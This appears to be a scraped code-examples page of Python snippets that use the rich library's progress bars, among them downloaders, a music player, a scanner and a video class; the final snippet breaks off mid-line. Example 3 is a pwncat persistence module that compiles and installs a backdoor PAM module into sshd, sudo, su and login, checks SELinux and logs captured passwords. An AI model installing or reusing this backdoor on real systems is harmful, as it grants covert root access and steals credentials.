Exemplo n.º 1
0
class Downloader:
    def __init__(self):
        self.exit = False
        # <---来自命令行的设置--->
        self.max_concurrent_downloads = 1
        # <---进度条--->
        self.progress = Progress(
            TextColumn("[bold blue]{task.fields[name]}", justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.2f}%",
            "•",
            DownloadColumn(),
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
        )

    def daemon(self, args: Namespace):
        '''
        一直循环调度下载和更新进度
        '''
        if args.repl is False:
            self.download_one_stream(args)
            # click.secho('Download end.')
            return
        while self.exit:
            break

    def download_one_stream(self, args: Namespace):
        extractor = Extractor(args)
        streams = extractor.fetch_metadata(args.URI[0])
        loop = get_event_loop()
        loop.run_until_complete(self.download_all_segments(loop, streams))
        loop.close()

    async def download_all_segments(self, loop: AbstractEventLoop,
                                    streams: List[Stream]):
        for index, stream in enumerate(streams):
            stream.show_info(index)
        all_results = []
        for stream in streams:
            click.secho(f'{stream.name} download start.')
            max_failed = 5
            while max_failed > 0:
                results = await self.do_with_progress(loop, stream)
                all_results.append(results)
                count_none, count_true, count_false = 0, 0, 0
                for _, flag in results.items():
                    if flag is True:
                        count_true += 1
                    elif flag is False:
                        count_false += 1
                    else:
                        count_none += 1
                # 出现False则说明无法下载
                if count_false > 0:
                    break
                # False 0 出现None则说明需要继续下载 否则合并
                if count_none > 0:
                    max_failed -= 1
                    continue
                else:
                    stream.concat()
                    break
        return all_results

    def get_left_segments(self, stream: Stream):
        completed = 0
        _left_segments = []
        for segment in stream.segments:
            segment_path = segment.get_path()
            if segment_path.exists() is True:
                # 文件落盘 说明下载一定成功了
                if segment_path.stat().st_size == 0:
                    segment_path.unlink()
                else:
                    completed += segment_path.stat().st_size
                    continue
            _left_segments.append(segment)
        return completed, _left_segments

    def init_progress(self, stream: Stream, completed: int):
        stream_id = self.progress.add_task("download",
                                           name=stream.name,
                                           start=False)  # TaskID
        if completed > 0:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = completed
                stream.filesize = total
            self.progress.update(stream_id, completed=completed, total=total)
        else:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = 0
                stream.filesize = total
            self.progress.update(stream_id, total=total)
        return stream_id

    async def do_with_progress(self, loop: AbstractEventLoop, stream: Stream):
        '''
        下载过程输出进度 并合理处理异常
        '''
        results = {}  # type: Dict[bool]
        tasks = set()  # type: Set[Task]

        def _done_callback(_future: Future) -> None:
            nonlocal results
            if _future.exception() is None:
                segment, status, flag = _future.result()
                if flag is None:
                    print('下载过程中出现已知异常 需重新下载\n')
                elif flag is False:
                    # 某几类已知异常 如状态码不对 返回头没有文件大小 视为无法下载 主动退出
                    if status in ['STATUS_CODE_ERROR', 'NO_CONTENT_LENGTH']:
                        # print('无法下载的m3u8 退出其他下载任务\n')
                        cancel_all_task()
                    else:
                        print(f'出现未知status -> {status} 退出其他下载任务\n')
                        cancel_all_task()
                results[segment] = flag
            else:
                # 出现未知异常 强制退出全部task
                print('出现未知异常 强制退出全部task\n')
                cancel_all_task()
                results[segment] = False

        def cancel_all_task() -> None:
            for task in tasks:
                task.remove_done_callback(_done_callback)
            for task in filter(lambda task: not task.done(), tasks):
                task.cancel()

        completed, _left = self.get_left_segments(stream)
        if len(_left) == 0:
            return results
        # 没有需要下载的则尝试合并 返回False则说明需要继续下载完整
        with self.progress:
            stream_id = self.init_progress(stream, completed)
            connector = TCPConnector(ttl_dns_cache=300,
                                     limit_per_host=4,
                                     limit=100,
                                     force_close=True,
                                     enable_cleanup_closed=True)
            for segment in _left:
                task = loop.create_task(
                    self.download(connector, stream_id, stream, segment))
                task.add_done_callback(_done_callback)
                tasks.add(task)
            finished, unfinished = await asyncio.wait(tasks)
            # 阻塞并等待运行完成
        return results

    async def download(self, connector: TCPConnector, stream_id: TaskID,
                       stream: Stream, segment: Segment):
        status, flag = 'EXIT', True
        try:
            async with request('GET',
                               segment.url,
                               connector=connector,
                               headers=segment.headers) as response:
                if response.status == 405:
                    status = 'STATUS_CODE_ERROR'
                    flag = False
                elif response.headers.get('Content-length') is None:
                    status = 'NO_CONTENT_LENGTH'
                    flag = False
                else:
                    stream.filesize += int(response.headers["Content-length"])
                    self.progress.update(stream_id, total=stream.filesize)
                    self.progress.start_task(stream_id)
                    while True:
                        data = await response.content.read(512)
                        if not data:
                            break
                        segment.content.append(data)
                        self.progress.update(stream_id, advance=len(data))
        except ClientConnectorError:
            return segment, 'ClientConnectorError', None
        except ClientPayloadError:
            return segment, 'ClientPayloadError', None
        except ConnectionResetError:
            return segment, 'ConnectionResetError', None
        except Exception:
            # print(e, f'{status}\n')
            return segment, status, False
        if flag is False:
            return segment, status, False
        return segment, 'SUCCESS', await self.decrypt(segment)

    async def decrypt(self, segment: Segment) -> bool:
        '''
        解密部分
        '''
        if segment.is_encrypt():
            cipher = CommonAES(segment.xkey.key,
                               binascii.a2b_hex(segment.xkey.iv))
            return cipher.decrypt(segment)
        else:
            return segment.dump()
Exemplo n.º 2
0
def play(playlist: int, random_play: bool):
    """播放歌单

    如果没有指定歌单id,默认播放名为 `我喜欢的音乐` 的歌单

    默认循环播放列表,可以使用 --random 选项来随机播放

    Args:
        playlist (int): 歌单id
        random (bool): 是否随机播放
    """
    if not playlist:
        user_playlist = api.get_user_playlist()
        for pl in user_playlist.playlist:
            if pl.name == '我喜欢的音乐':
                playlist = pl.id
                break

        if not playlist:
            rich.print('[red]没有找到播放列表')

    # start progress rendering in seprate thread immediately
    progress = Progress(
        '[yellow]{task.fields[status]}[/yellow] '
        '[progress.description]{task.description}',
        '[blue]{task.fields[encode]}',
        '[cyan]{task.fields[quality]}',
        BarColumn(),
        TotalFileSizeColumn(),
        '[progress.percentage]{task.percentage:>3.0f}%',
    )
    Thread(target=progress.start, name='progress rendering').start()

    # initialize task queue
    task_queue: Queue[CachingMusicFileTask] = Queue(2)

    # initialize playtask
    play_task_id = progress.add_task('play',
                                     start=False,
                                     total=0,
                                     status='P',
                                     encode='-',
                                     quality='-')

    # start download threads
    thread_1 = CachingMusicFile(task_queue)
    thread_1.start()
    thread_2 = CachingMusicFile(task_queue)
    thread_2.start()

    # initialize tasks
    tasks = []
    tracks = api.get_playlist_detail(playlist).playlist.tracks
    tracks_id = list(map(lambda t: t.id, tracks))
    musics = api.get_songs_url(tracks_id, 0).data
    for track, music in zip(tracks, musics):
        music_cache_path = os.path.join(config.cache_folder,
                                        f'{track.id}.{music.type}')
        tasks.append(
            CachingMusicFileTask(
                progress,
                progress.add_task(f'{track.name}',
                                  total=0,
                                  encode=music.type,
                                  quality=f'{music.br/1000}K',
                                  status='D'), music.url, music_cache_path))

    # initialize download task queue
    def feed_taskq_queue():
        for task in tasks:
            task_queue.put(task)

    Thread(target=feed_taskq_queue, name='task producer').start()

    # start play
    local_musics = list(zip(tracks, musics))
    last_play_obj = None
    idx = 0
    while True:
        if random_play:
            track, music = random.choice(local_musics)
        else:
            if idx >= len(local_musics):
                idx = 0
            track, music = local_musics[idx]
            idx += 1

        local_path = os.path.join(config.cache_folder,
                                  f'{track.id}.{music.type}')
        progress.update(play_task_id, description=track.name)

        if Path(local_path).is_file():
            mf = mad.MadFile(Path(local_path).open('rb'))
            while True:
                buf = mf.read()
                if buf is None:
                    break

                if last_play_obj is not None and last_play_obj.is_playing():
                    last_play_obj.wait_done()

                last_play_obj = sa.play_buffer(buf, 2, 2, mf.samplerate())
Exemplo n.º 3
0
    def install(self, user: Optional[str] = None):
        """ Install the persistence method """

        if pwncat.victim.current_user.id != 0:
            raise PersistenceError("must be root")

        try:
            # Enumerate SELinux state
            selinux = pwncat.victim.enumerate.first("system.selinux").data
            # If enabled and enforced, it will block this from working
            if selinux.enabled and "enforc" in selinux.mode:
                raise PersistenceError("selinux is currently in enforce mode")
            elif selinux.enabled:
                # If enabled but permissive, it will log this module
                console.log(
                    "[yellow]warning[/yellow]: selinux is enabled; persistence may be logged"
                )
        except ValueError:
            # SELinux not found
            pass

        # We use the backdoor password. Build the string of encoded bytes
        # These are placed in the source like: char password_hash[] = {0x01, 0x02, 0x03, ...};
        password = hashlib.sha1(
            pwncat.victim.config["backdoor_pass"].encode("utf-8")
        ).digest()
        password = "******".join(hex(c) for c in password)

        # Insert our key
        sneaky_source = self.sneaky_source.replace("__PWNCAT_HASH__", password)

        # Insert the log location for successful passwords
        sneaky_source = sneaky_source.replace("__PWNCAT_LOG__", "/var/log/firstlog")

        progress = Progress(
            "installing pam module",
            "•",
            "[cyan]{task.fields[status]}",
            transient=True,
            console=console,
        )
        task = progress.add_task("", status="initializing")

        # Write the source
        try:
            progress.start()

            progress.update(task, status="compiling shared library")

            try:
                # Compile our source for the remote host
                lib_path = pwncat.victim.compile(
                    [io.StringIO(sneaky_source)],
                    suffix=".so",
                    cflags=["-shared", "-fPIE"],
                    ldflags=["-lcrypto"],
                )
            except (FileNotFoundError, CompilationError) as exc:
                raise PersistenceError(f"pam: compilation failed: {exc}")

            progress.update(task, status="locating pam module installation")

            # Locate the pam_deny.so to know where to place the new module
            pam_modules = "/usr/lib/security"
            try:
                results = (
                    pwncat.victim.run(
                        "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
                    )
                    .strip()
                    .decode("utf-8")
                )
                if results != "":
                    results = results.split("\n")
                    pam_modules = os.path.dirname(results[0])
            except FileNotFoundError:
                pass

            progress.update(task, status=f"pam modules located at {pam_modules}")

            # Ensure the directory exists and is writable
            access = pwncat.victim.access(pam_modules)
            if (Access.DIRECTORY | Access.WRITE) in access:
                # Copy the module to a non-suspicious path
                progress.update(task, status="copying shared library")
                pwncat.victim.env(
                    ["mv", lib_path, os.path.join(pam_modules, "pam_succeed.so")]
                )
                new_line = "auth\tsufficient\tpam_succeed.so\n"

                progress.update(task, status="adding pam auth configuration")

                # Add this auth method to the following pam configurations
                for config in ["sshd", "sudo", "su", "login"]:
                    progress.update(
                        task, status=f"adding pam auth configuration: {config}"
                    )
                    config = os.path.join("/etc/pam.d", config)
                    try:
                        # Read the original content
                        with pwncat.victim.open(config, "r") as filp:
                            content = filp.readlines()
                    except (PermissionError, FileNotFoundError):
                        continue

                    # We need to know if there is a rootok line. If there is,
                    # we should add our line after it to ensure that rootok still
                    # works.
                    contains_rootok = any("pam_rootok" in line for line in content)

                    # Add this auth statement before the first auth statement
                    for i, line in enumerate(content):
                        # We either insert after the rootok line or before the first
                        # auth line, depending on if rootok is present
                        if contains_rootok and "pam_rootok" in line:
                            content.insert(i + 1, new_line)
                        elif not contains_rootok and line.startswith("auth"):
                            content.insert(i, new_line)
                            break
                    else:
                        content.append(new_line)

                    content = "".join(content)

                    try:
                        with pwncat.victim.open(
                            config, "w", length=len(content)
                        ) as filp:
                            filp.write(content)
                    except (PermissionError, FileNotFoundError):
                        continue

                pwncat.victim.tamper.created_file("/var/log/firstlog")

        except FileNotFoundError as exc:
            # A needed binary wasn't found. Clean up whatever we created.
            raise PersistenceError(str(exc))
        finally:
            progress.stop()
Exemplo n.º 4
0
    def main(self):
        q_targets = multiprocessing.Manager().Queue()  # targets Queue

        q_targets_list = []
        q_results = multiprocessing.Manager().Queue()  # results Queue
        fofa_result = multiprocessing.Manager().Queue()  # results Queue
        # 目标处理完成,扫描进程才可以开始退出
        process_targets_done = multiprocessing.Value('i', 0)

        for input_file in self.input_files:
            # 读取目标
            if self.host:
                target_list = self.host.replace(',', ' ').strip().split()

            elif self.file or self.dire:
                with open(input_file, encoding='UTF-8',
                          errors='ignore') as inFile:
                    target_list = list(set(inFile.readlines()))

            try:
                import threading
                # 实时生成报告
                target_count = len(target_list)  # 目标数
                # 生成报告,管理标准输出
                threading.Thread(target=save_report,
                                 args=(self, q_results, input_file,
                                       target_count)).start()

                clear_queue(q_results)
                clear_queue(q_targets)

                process_targets_done.value = 0
                start_time = time.time()

                p = multiprocessing.Process(target=prepare_targets,
                                            args=(target_list, q_targets, self,
                                                  fofa_result))
                p.daemon = True
                p.start()
                p.join()  # join 是用来阻塞当前线程的,p.start()之后,p 就提示主进程,需要等待p结束才向下执行
                time.sleep(1.0)  # 让prepare_targets进程尽快开始执行

                logger.log(
                    'INFOR',
                    f'All preparations have been completed and it took %.1f seconds!'
                    % (time.time() - start_time))

                # 根据电脑 CPU 的内核数量, 创建相应的进程池
                # count = multiprocessing.cpu_count()
                count = 30
                # 少量目标,至多创建2倍扫描进程
                if len(target_list) * 2 < count:
                    count = len(target_list) * 2

                if self.fofa and fofa_result.qsize() > 0:
                    # fofa 搜索结果保存
                    save_fofa(self, fofa_result, input_file)

                while True:
                    if not q_targets.empty():
                        q_targets_list.append(q_targets.get())
                    else:
                        break

                # q_targets.get() {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '', 'ports_open': [80, 443], 'is_neighbor': 0}
                progress = Progress(
                    "[progress.description]{task.description}",
                    BarColumn(),
                    "[progress.percentage]{task.percentage:>3.1f}%",
                    "•",
                    "[bold green]{task.completed}/{task.total}",
                    transient=True,  # 100%后隐藏进度条
                )

                with progress:
                    targets = []
                    for target in q_targets_list:
                        tmp = [target, q_results, self]
                        targets.append(tmp)

                    progress_bar = progress.add_task("[cyan]Leak detection...",
                                                     total=len(targets),
                                                     start=False)

                    with multiprocessing.Pool(processes=count) as pool:
                        results = pool.imap_unordered(scan_process, targets)
                        for result in results:
                            # progress.print(result)
                            progress.advance(progress_bar)

                        pool.close()
                        pool.join()
                        time.sleep(1.0)  # 让prepare_targets进程尽快开始执行

                cost_time = time.time() - start_time
                cost_min = int(cost_time / 60)
                cost_min = '%s min ' % cost_min if cost_min > 0 else ''
                cost_seconds = '%.1f' % (cost_time % 60)
                logger.log(
                    'INFOR',
                    f'Scanned {len(q_targets_list)} targets in {cost_min}{cost_seconds} seconds.'
                )
            except Exception as e:
                logger.log('FATAL', f'[__main__.exception] %s' % repr(e))
                import traceback
                logger.log('FATAL', traceback.format_exc())
            setting.stop_me = True
Exemplo n.º 5
0
class WallHaven(object):
    def __init__(self) -> None:
        self.base_url = "https://wallhaven.cc/search?q=like%3Arddgwm&page="
        self.progress = Progress()

    async def get_list_image_page(self, session: ClientSession,
                                  url: str) -> None:
        """获取图片列表页"""
        try:
            async with session.get(url) as resp:
                if resp.status == 200:
                    html = await resp.text(encoding="utf8")
                    if html:
                        await self.parse_image_link(session, html)
                    return
                return
        except ClientResponseError:
            return

    async def parse_image_link(self, session: ClientSession,
                               html: str) -> None:
        """解析列表页小图链接"""
        element = etree.HTML(html)
        links = element.xpath('//img[@alt="loading"]/@data-src')
        for image_link in links:
            image_link = await self.image_link_process(image_link)
            await self.download_image(session, image_link)

    @staticmethod
    async def image_link_process(image_link: str) -> str:
        """转换图片链接"""
        if "small" in image_link:
            image_link = image_link.replace("th", "w")
            image_link = image_link.replace("small", "full")
            url_path = image_link.split("/")
            url_path[-1] = f"wallhaven-{url_path[-1]}"
            image_link = "/".join(url_path)
            return image_link

    async def download_image(self, session: ClientSession,
                             image_link: str) -> None:
        """下载图片"""
        async with session.get(image_link) as resp:
            try:
                # 获取图片字节总长度
                file_size = int(resp.headers['content-length'])
                if resp.status == 200:
                    file_name = image_link.split("/")[-1]
                    async with aiofiles.open(file=f"images/{file_name}",
                                             mode="ab") as f:
                        self.progress.start()
                        task = self.progress.add_task(
                            f'[red]Downloading...{file_name}', total=file_size)
                        while True:
                            chunk = await resp.content.read(1024)
                            if not chunk:
                                break
                            await f.write(chunk)
                            self.progress.update(task, advance=1024)
                        self.progress.stop()
            except Exception:
                return

    async def run(self):
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
        }
        # 限制最大连接数
        async with aiohttp.TCPConnector(
            limit=200,
            force_close=True,
            enable_cleanup_closed=True,
        ) as tc:
            # 创建session对象
            async with ClientSession(connector=tc, headers=headers) as session:
                urls = [f"{self.base_url}{i}" for i in range(1, 9)]
                # 创建任务
                tasks = [
                    asyncio.ensure_future(
                        self.get_list_image_page(session, url)) for url in urls
                ]
                # 等待任务完成
                await asyncio.gather(*tasks)
Exemplo n.º 6
0
def run():
    """
    Run the Console Interface for Unsilence
    :return: None
    """
    sys.tracebacklimit = 0

    args = parse_arguments()
    console = Console()

    if args.debug:
        sys.tracebacklimit = 1000

    if args.output_file.exists() and not args.non_interactive_mode:
        if not choice_dialog(
                console, "File already exists. Overwrite?", default=False):
            return

    args_dict = vars(args)

    argument_list_for_silence_detect = [
        "silence_level", "silence_time_threshold", "short_interval_threshold",
        "stretch_time"
    ]

    argument_dict_for_silence_detect = {
        key: args_dict[key]
        for key in argument_list_for_silence_detect if key in args_dict.keys()
    }

    argument_list_for_renderer = [
        "audio_only", "audible_speed", "silent_speed", "audible_volume",
        "silent_volume", "drop_corrupted_intervals", "threads"
    ]

    argument_dict_for_renderer = {
        key: args_dict[key]
        for key in argument_list_for_renderer if key in args_dict.keys()
    }

    progress = Progress()

    continual = Unsilence(args.input_file)

    with progress:

        def update_task(current_task):
            def handler(current_val, total):
                progress.update(current_task,
                                total=total,
                                completed=current_val)

            return handler

        silence_detect_task = progress.add_task("Calculating Intervals...",
                                                total=1)

        continual.detect_silence(
            on_silence_detect_progress_update=update_task(silence_detect_task),
            **argument_dict_for_silence_detect)

        progress.stop()
        progress.remove_task(silence_detect_task)

        print()

        estimated_time = continual.estimate_time(args.audible_speed,
                                                 args.silent_speed)
        console.print(pretty_time_estimate(estimated_time))

        print()

        if not args.non_interactive_mode:
            if not choice_dialog(
                    console, "Continue with these options?", default=True):
                return

        progress.start()
        rendering_task = progress.add_task("Rendering Intervals...", total=1)
        concat_task = progress.add_task("Combining Intervals...", total=1)

        continual.render_media(
            args.output_file,
            on_render_progress_update=update_task(rendering_task),
            on_concat_progress_update=update_task(concat_task),
            **argument_dict_for_renderer)

        progress.stop()

    console.print("\n[green]Finished![/green] :tada:")
Exemplo n.º 7
0
class KrakenTrainProgressBar(ProgressBarBase):
    """
    Adaptation of the default ptl rich progress bar to fit with kraken (segtrain, train) output.

    Args:
        refresh_rate: Determines at which rate (in number of batches) the progress bars get updated.
            Set it to ``0`` to disable the display.
        leave: Leaves the finished progress bar in the terminal at the end of the epoch. Default: False
        console_kwargs: Args for constructing a `Console`
    """
    def __init__(self,
                 refresh_rate: int = 1,
                 leave: bool = True,
                 console_kwargs: Optional[Dict[str, Any]] = None) -> None:
        super().__init__()
        self._refresh_rate: int = refresh_rate
        self._leave: bool = leave
        self._console_kwargs = console_kwargs or {}
        self._enabled: bool = True
        self.progress: Optional[Progress] = None
        self.val_sanity_progress_bar_id: Optional[int] = None
        self._reset_progress_bar_ids()
        self._metric_component = None
        self._progress_stopped: bool = False

    @property
    def refresh_rate(self) -> float:
        return self._refresh_rate

    @property
    def is_enabled(self) -> bool:
        return self._enabled and self.refresh_rate > 0

    @property
    def is_disabled(self) -> bool:
        return not self.is_enabled

    def disable(self) -> None:
        self._enabled = False

    def enable(self) -> None:
        self._enabled = True

    @property
    def sanity_check_description(self) -> str:
        return "Validation Sanity Check"

    @property
    def validation_description(self) -> str:
        return "Validation"

    @property
    def test_description(self) -> str:
        return "Testing"

    def _init_progress(self, trainer):
        if self.is_enabled and (self.progress is None
                                or self._progress_stopped):
            self._reset_progress_bar_ids()
            self._console = Console(**self._console_kwargs)
            self._console.clear_live()
            columns = self.configure_columns(trainer)
            self._metric_component = MetricsTextColumn(trainer)
            columns.append(self._metric_component)

            if trainer.early_stopping_callback:
                self._early_stopping_component = EarlyStoppingColumn(trainer)
                columns.append(self._early_stopping_component)

            self.progress = Progress(*columns,
                                     auto_refresh=False,
                                     disable=self.is_disabled,
                                     console=self._console)
            self.progress.start()
            # progress has started
            self._progress_stopped = False

    def refresh(self) -> None:
        if self.progress:
            self.progress.refresh()

    def on_train_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_test_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_validation_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_end(self, trainer, pl_module):
        if self.progress is not None:
            self.progress.update(self.val_sanity_progress_bar_id,
                                 advance=0,
                                 visible=False)
        self.refresh()

    def on_train_epoch_start(self, trainer, pl_module):
        total_train_batches = self.total_train_batches
        total_val_batches = self.total_val_batches
        if total_train_batches != float("inf"):
            # val can be checked multiple times per epoch
            val_checks_per_epoch = total_train_batches // trainer.val_check_batch
            total_val_batches = total_val_batches * val_checks_per_epoch

        total_batches = total_train_batches + total_val_batches

        train_description = f"stage {trainer.current_epoch}/{trainer.max_epochs if pl_module.hparams.quit == 'dumb' else '∞'}"
        if len(self.validation_description) > len(train_description):
            # Padding is required to avoid flickering due of uneven lengths of "Epoch X"
            # and "Validation" Bar description
            num_digits = len(str(trainer.current_epoch))
            required_padding = (len(self.validation_description) -
                                len(train_description) + 1) - num_digits
            for _ in range(required_padding):
                train_description += " "

        if self.main_progress_bar_id is not None and self._leave:
            self._stop_progress()
            self._init_progress(trainer)
        if self.main_progress_bar_id is None:
            self.main_progress_bar_id = self._add_task(total_batches,
                                                       train_description)
        elif self.progress is not None:
            self.progress.reset(self.main_progress_bar_id,
                                total=total_batches,
                                description=train_description,
                                visible=True)
        self.refresh()

    def on_validation_epoch_start(self, trainer, pl_module):
        if trainer.sanity_checking:
            self.val_sanity_progress_bar_id = self._add_task(
                self.total_val_batches, self.sanity_check_description)
        else:
            self.val_progress_bar_id = self._add_task(
                self.total_val_batches,
                self.validation_description,
                visible=False)
        self.refresh()

    def _add_task(self,
                  total_batches: int,
                  description: str,
                  visible: bool = True) -> Optional[int]:
        if self.progress is not None:
            return self.progress.add_task(f"{description}",
                                          total=total_batches,
                                          visible=visible)

    def _update(self,
                progress_bar_id: int,
                current: int,
                total: Union[int, float],
                visible: bool = True) -> None:
        if self.progress is not None and self._should_update(current, total):
            leftover = current % self.refresh_rate
            advance = leftover if (current == total
                                   and leftover != 0) else self.refresh_rate
            self.progress.update(progress_bar_id,
                                 advance=advance,
                                 visible=visible)
            self.refresh()

    def _should_update(self, current: int, total: Union[int, float]) -> bool:
        return self.is_enabled and (current % self.refresh_rate == 0
                                    or current == total)

    def on_validation_epoch_end(self, trainer, pl_module):
        if self.val_progress_bar_id is not None and trainer.state.fn == "fit":
            self.progress.update(self.val_progress_bar_id,
                                 advance=0,
                                 visible=False)
            self.refresh()

    def on_validation_end(self, trainer: "pl.Trainer",
                          pl_module: "pl.LightningModule") -> None:
        if trainer.state.fn == "fit":
            self._update_metrics(trainer, pl_module)

    def on_test_epoch_start(self, trainer, pl_module):
        self.test_progress_bar_id = self._add_task(self.total_test_batches,
                                                   self.test_description)
        self.refresh()

    def on_train_batch_end(self, trainer, pl_module, outputs, batch,
                           batch_idx):
        self._update(self.main_progress_bar_id, self.train_batch_idx,
                     self.total_train_batches)
        self._update_metrics(trainer, pl_module)
        self.refresh()

    def on_train_epoch_end(self, trainer: "pl.Trainer",
                           pl_module: "pl.LightningModule") -> None:
        self._update_metrics(trainer, pl_module)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        if trainer.sanity_checking:
            self._update(self.val_sanity_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        elif self.val_progress_bar_id is not None:
            # check to see if we should update the main training progress bar
            if self.main_progress_bar_id is not None:
                self._update(self.main_progress_bar_id, self.val_batch_idx,
                             self.total_val_batches)
            self._update(self.val_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        self.refresh()

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        self._update(self.test_progress_bar_id, self.test_batch_idx,
                     self.total_test_batches)
        self.refresh()

    def _stop_progress(self) -> None:
        if self.progress is not None:
            self.progress.stop()
            # # signals for progress to be re-initialized for next stages
            self._progress_stopped = True

    def _reset_progress_bar_ids(self):
        self.main_progress_bar_id: Optional[int] = None
        self.val_progress_bar_id: Optional[int] = None
        self.test_progress_bar_id: Optional[int] = None

    def _update_metrics(self, trainer, pl_module) -> None:
        metrics = self.get_metrics(trainer, pl_module)
        metrics.pop('loss', None)
        metrics.pop('val_metric', None)
        if self._metric_component:
            self._metric_component.update(metrics)

    def teardown(self,
                 trainer,
                 pl_module,
                 stage: Optional[str] = None) -> None:
        self._stop_progress()

    def on_exception(self, trainer, pl_module,
                     exception: BaseException) -> None:
        self._stop_progress()

    @property
    def val_progress_bar(self) -> Task:
        return self.progress.tasks[self.val_progress_bar_id]

    @property
    def val_sanity_check_bar(self) -> Task:
        return self.progress.tasks[self.val_sanity_progress_bar_id]

    @property
    def main_progress_bar(self) -> Task:
        return self.progress.tasks[self.main_progress_bar_id]

    @property
    def test_progress_bar(self) -> Task:
        return self.progress.tasks[self.test_progress_bar_id]

    def configure_columns(self, trainer) -> list:
        return [
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            BatchesProcessedColumn(),
            TimeRemainingColumn(),
            TimeElapsedColumn()
        ]
Exemplo n.º 8
0
class Video:
    def __init__(
        self,
        camera: Optional[int] = None,
        input_path: Optional[str] = None,
        output_path: str = ".",
        output_fps: Optional[float] = None,
        label: str = "",
        codec_fourcc: Optional[str] = None,
    ):
        self.camera = camera
        self.input_path = input_path
        self.output_path = output_path
        self.label = label
        self.codec_fourcc = codec_fourcc
        self.output_video: Optional[cv2.VideoWriter] = None

        # Input validation
        if (input_path is None and camera is None) or (input_path is not None
                                                       and camera is not None):
            raise ValueError(
                "You must set either 'camera' or 'input_path' arguments when setting 'Video' class"
            )
        if camera is not None and type(camera) is not int:
            raise ValueError(
                "Argument 'camera' refers to the device-id of your camera, and must be an int. Setting it to 0 usually works if you don't know the id."
            )

        # Read Input Video
        if self.input_path is not None:
            if "~" in self.input_path:
                self.input_path = os.path.expanduser(self.input_path)
            if not os.path.isfile(self.input_path):
                self._fail(
                    f"[bold red]Error:[/bold red] File '{self.input_path}' does not exist."
                )
            self.video_capture = cv2.VideoCapture(self.input_path)
            total_frames = int(self.video_capture.get(
                cv2.CAP_PROP_FRAME_COUNT))
            if total_frames == 0:
                self._fail(
                    f"[bold red]Error:[/bold red] '{self.input_path}' does not seem to be a video file supported by OpenCV. If the video file is not the problem, please check that your OpenCV installation is working correctly."
                )
            description = os.path.basename(self.input_path)
        else:
            self.video_capture = cv2.VideoCapture(self.camera)
            total_frames = 0
            description = f"Camera({self.camera})"
        self.output_fps = (output_fps if output_fps is not None else
                           self.video_capture.get(cv2.CAP_PROP_FPS))
        self.input_height = self.video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)
        self.input_width = self.video_capture.get(cv2.CAP_PROP_FRAME_WIDTH)
        self.frame_counter = 0

        # Setup progressbar
        if self.label:
            description += f" | {self.label}"
        progress_bar_fields: List[Union[str, ProgressColumn]] = [
            "[progress.description]{task.description}",
            BarColumn(),
            "[yellow]{task.fields[process_fps]:.2f}fps[/yellow]",
        ]
        if self.input_path is not None:
            progress_bar_fields.insert(
                2, "[progress.percentage]{task.percentage:>3.0f}%")
            progress_bar_fields.insert(
                3,
                TimeRemainingColumn(),
            )
        self.progress_bar = Progress(
            *progress_bar_fields,
            auto_refresh=False,
            redirect_stdout=False,
            redirect_stderr=False,
        )
        self.task = self.progress_bar.add_task(
            self.abbreviate_description(description),
            total=total_frames,
            start=self.input_path is not None,
            process_fps=0,
        )

    # This is a generator, note the yield keyword below.
    def __iter__(self):
        with self.progress_bar as progress_bar:
            start = time.time()

            # Iterate over video
            while True:
                self.frame_counter += 1
                ret, frame = self.video_capture.read()
                if ret is False or frame is None:
                    break
                process_fps = self.frame_counter / (time.time() - start)
                progress_bar.update(self.task,
                                    advance=1,
                                    refresh=True,
                                    process_fps=process_fps)
                yield frame

        # Cleanup
        if self.output_video is not None:
            self.output_video.release()
            print(
                f"[white]Output video file saved to: {self.get_output_file_path()}[/white]"
            )
        self.video_capture.release()
        cv2.destroyAllWindows()

    def _fail(self, msg: str):
        print(msg)
        exit()

    def write(self, frame: np.array) -> int:
        if self.output_video is None:
            # The user may need to access the output file path on their code
            output_file_path = self.get_output_file_path()
            fourcc = cv2.VideoWriter_fourcc(
                *self.get_codec_fourcc(output_file_path))
            # Set on first frame write in case the user resizes the frame in some way
            output_size = (
                frame.shape[1],
                frame.shape[0],
            )  # OpenCV format is (width, height)
            self.output_video = cv2.VideoWriter(
                output_file_path,
                fourcc,
                self.output_fps,
                output_size,
            )

        self.output_video.write(frame)
        return cv2.waitKey(1)

    def show(self, frame: np.array, downsample_ratio: int = 1) -> int:
        # Resize to lower resolution for faster streaming over slow connections
        if downsample_ratio is not None:
            # Note that frame.shape[1] corresponds to width, and opencv format is (width, height)
            frame = cv2.resize(
                frame,
                (
                    frame.shape[1] // downsample_ratio,
                    frame.shape[0] // downsample_ratio,
                ),
            )
        cv2.imshow("Output", frame)
        return cv2.waitKey(1)

    def get_output_file_path(self) -> str:
        output_path_is_dir = os.path.isdir(self.output_path)
        if output_path_is_dir and self.input_path is not None:
            base_file_name = self.input_path.split("/")[-1].split(".")[0]
            file_name = base_file_name + "_out.mp4"
            return os.path.join(self.output_path, file_name)
        elif output_path_is_dir and self.camera is not None:
            file_name = f"camera_{self.camera}_out.mp4"
            return os.path.join(self.output_path, file_name)
        else:
            return self.output_path

    def get_codec_fourcc(self, filename: str) -> Optional[str]:
        if self.codec_fourcc is not None:
            return self.codec_fourcc

        # Default codecs for each extension
        extension = filename[-3:].lower()
        if "avi" == extension:
            return "XVID"
        elif "mp4" == extension:
            return "mp4v"  # When available, "avc1" is better
        else:
            self._fail(
                f"[bold red]Could not determine video codec for the provided output filename[/bold red]: "
